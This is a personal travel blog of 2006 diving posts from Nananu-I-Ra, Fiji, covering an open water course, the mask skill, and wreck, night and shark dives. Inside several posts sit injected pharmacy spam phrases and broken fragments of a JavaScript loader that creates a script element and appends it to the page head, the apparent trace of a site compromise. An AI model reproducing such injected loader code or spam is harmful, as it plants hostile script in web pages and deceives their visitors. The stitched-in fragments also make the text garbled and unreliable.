Last dives

Posted by admin On August - 6 - 2006

For my last dives I wished to go to my favourite dive site ‘Golden Dreams’ with ‘Shark Junction’ and a would really like to see ‘The Maze’ the only dive site in Nananu I had never seen. I was really happy when we went there. We done a deep dive in 30m at the ‘Shark Junction’ and then dives to ‘Golden Dreams’. It was so beautiful and I saw again white tip reef sharks. ‘The Maze’ was nice as well and full of corals.

Eagle Ray and Turtle

Posted by admin On August - 4 - 2006

After having the best breakfast since weeks I was picked up by the boat from ‘Reef Safari’ at ‘Mantaray Resort’. I booked two dives but asked before if it is possible to catch the afternoon Yasawa flyer back to Denerau/Nadi. It was. So I was looking forward to dive again and hopefully see a ray. I had two dives – two chances! And right on the first dive in the morning I saw an Eagle ray, a turtle (my second turtle) and a White tip reef shark. It was amazing. Just great! The dive site was ‘Blue room’. The next dive was at ‘Coral orgasm’ and we dived trough underwater gates and saw some puffer fish and beautiful corals. Then I had a quick lunch at ‘Coconut Bay’ and then the Yasawa flyer picked us up (the israelis left as well). Back in Nadi I slept in ‘Horizon’ and was looking forward for coming back to Nananu-I-Ra just for the last weekend.

Finally this Monday is the big day – we will see the worlds best shark feeding in Pacific Harbour of Beqa Adventures Divers. Its was so exciting. Apart from Glenn and me, Johnny, Sam and Marina done the shark feeding as well. It was great and worth it… The first dive was at 31m (51min) dept the second dive in 16m (49min) and we saw Giant Trevally, a Queensland Grooper, a Moray, White Tip Reef Sharks, Black Tip Reef Sharks, Grey Sharks, a Nurse Shark, a Lemon Shark and Bull Sharks. Later we got a brilliant 40min shark DVD. After the shark feeding Glenn and I went straight back to Nadi.

Wreck diving

Posted by admin On July - 19 - 2006

The last dive in the advanced mode was a wreck dive in the ‘Papanu Explorer’. We met at 6:30am because Adrian (Dive con) picked up his girl friend Kirsten from the airport today. The wreck was amazing. The visibility was not that good, the water was a bit blurry but then there it was. First of all we swam araund it and then from the bottom up throgh each room. I saw a big sleeping fish and some giant clam shells. In the evening got my Logbook with my advanced certivicate back. Have now 14 dives.

At 11:30pm Glenn and I took the boat to Rakiraki for shopping. Had a nice day, good food and good conversation. On the way back to the island we stoped at a fish shop and I bought a snapper just for F$ 2,40! Will prepare the fish the next day with fresh coconut sauce.

In the evening was Lovo (like Maori Hangi) night with the traditional polinesian dance.

Night dive

Posted by admin On July - 18 - 2006

Next in course was an ordinary boat dive but we went again to the ‘Shark Junction’ and saw about eight White Tip Reef Sharks. Very beautiful creatures. I dived over one and it was beautiful. Saw as well a sea snake. In the evening I done the night dive. My buddy was Aaron who gaves me the nice photos of some fish and the turtle. This dive was an experiment but didn’t like the night dives that much. Its dark and you go diving with a torch. If you swich out the light, you see the fluorecence particle in the water glow. The polyps of the coralls only come out at night time, some crabs moved and I saw open clam shells. pacific care pharmacy var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Golden Dreams

Posted by admin On July - 16 - 2006

Diving is addictive. After finishing my Open Water Course I decided to do one more dive because just find out how to dive just with using the lungs for diving up and down. We went to my favourite dive site ‘Golden Dreams’, next to ‘Shark Junction’. ‘Golden Dreams’ was in ‘National Geographic’ and Cousteau said it belongs to the ten best dive sites in the world. It was so wonderful. And the best of all was that I saw there today my first shark near the ‘Shark Junction’. It was a White Tip Reef Shark (see on Aarons picture below). I thought now I should do my Advanced Course. Glenn said I will be allright and can do it.

First boat dives

Posted by admin On July - 15 - 2006

After passing my mask skill and completing all skills I was ready for going diving in the breathtaking reefs at the Bligh Water around Nananu-I-Ra. And right on my first dive in the morning at ‘Bula Maker’ I saw a turtle. It was so beautiful. On the afternoon dive we went to another dive site called ‘Dream Maker’. Both beautiful with corals and hundreds of different fish. In the evening made the written multiple choice test for finishing the Open Water course. In the evening we had the beach party

The mask skill

Posted by admin On July - 14 - 2006

This friday was a sunny day. I was excited because I didnt like to take of the mask under water. Its so irritating when the cold water comes into the face that you stop breathing and when you start again you use the nose. Fortunally I wasnt alone. Another girl, Ann, was not able to do some of the skills as well. Glenn was really patient with us and we first done the regulator skill, then he took us for a nice fun dive around the reef in front of the Nananu beach. That was great. In the end we done the mask skill, and after he told us some tricks we both were able to pass the mask skill. Finally. I was so happy. In the afternoon I had a dive alone with dive con Andy at the front beach reef. Was good but had in the beginning some equilizing problems with my left ear. Couldnt go that fast deeper in the beginning. But later on had great fun and enjoyed more the single dives that the dives with bigger groups. buy levemir flexpen no prescription } else {d.getElementsByTagName(‘head’)[0].appendChild(s);

Diving skills

Posted by admin On July - 12 - 2006

For diving we met each day at 7:45am at the dive shop for preparing our gear. We constructed the diving equipment. Then we improved our diving skills . We had to take of the weight belt, the BCD and the regulator under water. Unfortunately I failed with the mask skill. It was to scary for me taking off the mask under water. I started panicing. Felt not save. Was really dissappointed because couldnt made it and the dive instructor Chris said, if I can’t manage it I will not go diving with the group at the beautiful reefs. I was very upset this evening and went to the beach watching the stars. The sky was so clear and I saw the southern cross and the milky way. When I came back the others helped me to chin up and later on the instructor said he was talking to Glen and I will get an extra mask skill dive the next day with him.d.getElementsByTagName(‘head’)[0].appendChild(s);

About Me

“The problem with modern man is that we have forgotten the language of silence, we have forgotten the way of the heart. We have completely forgotten that there is a life which can be lived through the heart. We are too much hung up in the head, and because we are too much in the head we cannot make any sense out of love. It becomes more and more problematic.”
